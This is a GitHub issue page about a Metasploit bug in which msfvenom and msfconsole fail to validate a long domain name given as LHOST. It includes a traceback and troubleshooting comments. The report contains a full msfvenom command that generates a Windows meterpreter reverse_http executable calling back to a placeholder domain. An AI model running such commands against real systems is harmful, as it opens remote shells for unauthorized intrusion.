New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
msfvenom and msfconsole fail to validate LHOST option with a long domain #9476
Comments
Is the hostname resolvable? |
Yes, it is. I can ping it through this hostname. |
Well, the reason it succeeds on the second case is that it sees |
So the question here is have you verified the payload works as intended? That second syntax you listed is not valid in any case. |
Works for me. |
Can you try the test above? |
It is worth noting that MSF will not validate domain names it can't resolve, whether or not they could be resolved from the intended target of the payload. |
tl;dr The |
So you are saying the domain has to be resolvable by metasploit at the moment of payload creation. This could be the issue, I need to do further testing since there are proxys involved in my setting. |
@pkreuzt I believe an entry in /etc/hosts file for the said domain should be enough to pass the check. Haven't checked it myself but it should work theoretically. |
still not working for me |
The error i came to know due to leaving space " " on lhost & lport |
Try this, its much simpler. Just change LHOST in the show options menu
thats it |
lhost= 127.0.0.1 Wrong |
من هم همین مشکل را البته با ngrok دارم. |
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload |
I have the same problem with termux ubuntu 20, msfvenom... Trying to set it to use noip ddns.net |
Just no space after the "=" |
The issue is likely "myverylongdomainname.com" is not reachable 1st Case: (msfvenom couldnt reach my address because it was on the tor network)
2nd Case: (proxychains4 connecting to tor network)
|
There seems to be an error in msfvenom which causes LHOST option to be not parseable under some circumstances. I have not been able to trace the error to the exact cause, but seems that if you specify LHOST to a long domain name with usual syntax it fails:
$ msfvenom -p windows/meterpreter/reverse_http -a x86 --platform windows LHOST=myverylongdomainname.com LPORT=9999 -f exe
Error: The following options failed to validate: LHOST.
But if you specify the same domain omitting the '=' symbol it behaves correctly:
$ msfvenom -p windows/meterpreter/reverse_http -a x86 --platform windows LHOSTmyverylongdomainname.com LPORT=9999 -f exe
[The payload is generated]
Also, if you specify LHOST to a short domain or an IP address it gets generated correctly too.
Error traceback (framework.log):
/usr/bin/msfvenom:332:in
<main>' [01/30/2018 10:26:16] [e(0)] core: Msf::OptionValidateError : The following options failed to validate: LHOST. /usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in
validate'/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in
generate' /usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:25:in
create'/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:53:in
generate_simple' /usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:138:in
generate_simple'/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:395:in
generate_raw_payload' /usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:341:in
generate_payload'The same issue affects msfconsole too, when setting LHOST to a long domain.
[01/30/2018 10:40:07] [e(0)] core: Exploit failed (multi/handler): The following options failed to validate: LHOST.
System stuff
Metasploit version
metasploit v4.16.34-dev installed in Kali via apt
The text was updated successfully, but these errors were encountered: